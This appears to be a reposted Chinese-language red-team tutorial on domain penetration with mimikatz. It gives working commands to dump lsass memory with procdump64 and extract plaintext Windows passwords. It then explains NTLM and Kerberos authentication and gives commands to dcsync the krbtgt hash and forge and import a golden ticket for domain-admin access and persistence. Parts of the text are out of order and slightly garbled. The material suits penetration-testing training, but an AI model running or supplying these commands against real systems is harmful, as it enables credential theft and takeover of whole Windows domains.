-
使用 procdump64+mimikatz 获取 win 用户明文密码
-
beacon> shell procdump64.exe -accepteula -ma lsass.exe lsass.dmp-accepteula 参数:指定是否自动接受 Microsoft 软件许可条款。所有无人参与安装都需要此设置。-ma 参数:生成 full dump, 即包括进程的所有内存. 默认的 dump 格式包括线程和句柄信息.
-
beacon>shell mimikatz.exe "sekurlsa::minidump lsass.dmp""sekurlsa::logonPasswords full" exit >pass.txt
-
download pass.txt 查看密码beacon>shell mimikatz.exe "sekurlsa::minidump lsass.dmp"
-
AD域认证
-
-
1.客户端计算用户密码,生成NTLM HASH
-
2.客户端将用户名发给应用服务器
-
3.应用服务器返回Nonce随机值给客户端
-
4.客户端使用NTLM HASH加密Nonce ,然后发回给应用服务器
-
5.APP服务器将用户名+Nonce +加密的Nonce全部发给DC
-
DC使用用户的NTLM HASH 加密Noncxxxxxxxx收到的加密Nonce对比,相同则认证成功
-
1
-
Kerberos身份认证
-
接下来KDC执行以下检查
-
如果检查成功,TGS向客户端返回TGS_REP,其中包含三部分内容:
-
.至此 KDC认证过程结束,客户端获得了会话密钥+ST,接下来开始服务认证过程
-
DC返回AS_REP,包含用户NTLM HASH加密的会话密钥+TGT (Ticket GrantingTicket) ; TGT包含用户、组成员、域、时间戳、客户端IP、会话密钥等信息。TGT使用KDC独有的安全密钥加密,客户端无法TGT生存周期为10小时,周期自动刷新(缓存于客户端)
-
1.用户登录域内计算机时,基于密码生成NTLM HASH。向DC发送AS_REQ,其中包含用户名+NTLM HASH 加密的时间戳;DC使用用户的NTLM HASH解密时间戳,如果解密成功且时间戳不重复(防重放攻击),则认证成功
-
-
3.用户需要访问域内资源时(SPN),再次联系KDC;向其请求服务票据TGS_REQ,其中包含会话密钥加密的当前用户名和时间戳+资源SPN+ TGT
-
4.如果SPN存在(不验证用户是否有权访问SPN) , KDC解密TGT获得会话密钥,用会话密钥解密出用户名和时间戳,接下来KDC执行以下检查:
-
5.客户端向应用服务器发起AP_REQ,其中包含会话密钥加密的用户名和时间戳+ST(包含会话密钥)
-
6.应用服务器使用服务帐户密码的 HASH 解密ST,获得用户名+会话密钥,使用会话密钥解密AP_REQ中的用户名,如果用户名与从ST解密得到的用户名一致,请求被接受。授予访问权限之前,服务检查ST中提供的组成员关系,并为用户分配适当的权限,至此用户P267022可以访问请求的服务了
-
TGT中的时间戳有效(无重放攻击,且未过期)
-
TGS_REQ和TGT中的用户名一致
-
客户端IP与TGT中的客户端IP一致
-
授权访问的 SPN
-
客户端和SPN之间使用的会话密钥
-
包含用户名和组成员关系以及新创建的会比出销的服务票据ST
-
前两个部分(SPN +会话密钥)使用TGT 中的会话密钥加密。ST使用SPN 服务帐号的NTLM HASH加密,并缓存于客户端
-
Kerberos
-
NTLM
-
黄金票据
-
cs制作(红日靶机三)
-
msf制作(红日靶机四)
-
权限机器->右键->Access->Golden Ticket
-
logonpasswords
-
-
-
-
load kiwidcsync_ntlm krbtgt//制作前建议把所有凭证清除kerberos::purge
golden_ticket_create //看看要设置哪些东西golden_ticket_create -d demo.com -u Administrator -s S-1-5-21-979886063-1111900045-1414766810-502 -k 7c4ed692473d4b4344c3ba01c5e6cb63 -t /root/golden.tck//golden_ticket_create -d 域全名 -u 伪造用户 -s 域SID -k "NTLM hash" -t 导出位置
-
导入黄金票据
-
票据验证
-
kerberos_ticket_use /root/golden.tck
-
dir WIN-ENS2VR5TR3Nc$可以访问成功
-
制作
-
域名称
-
域的SID值
-
域的KRBTGT账户NTLM密码哈希
-
伪造用户名
-
黄金票据是伪造票据授予票据(TGT),也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心(KDC)证明用户已被其他域控制器认证
-
黄金票据的条件要求:
-
黄金票据的作用黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当域控权限掉后,在通过域内其他任意机器伪造票据重新获取最高权限。
-
票据的制作
-
部分图片来自于互联网
-
欢迎大家加入
原文始发于微信公众号(乌托邦安全团队):内网渗透之mimikatz
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论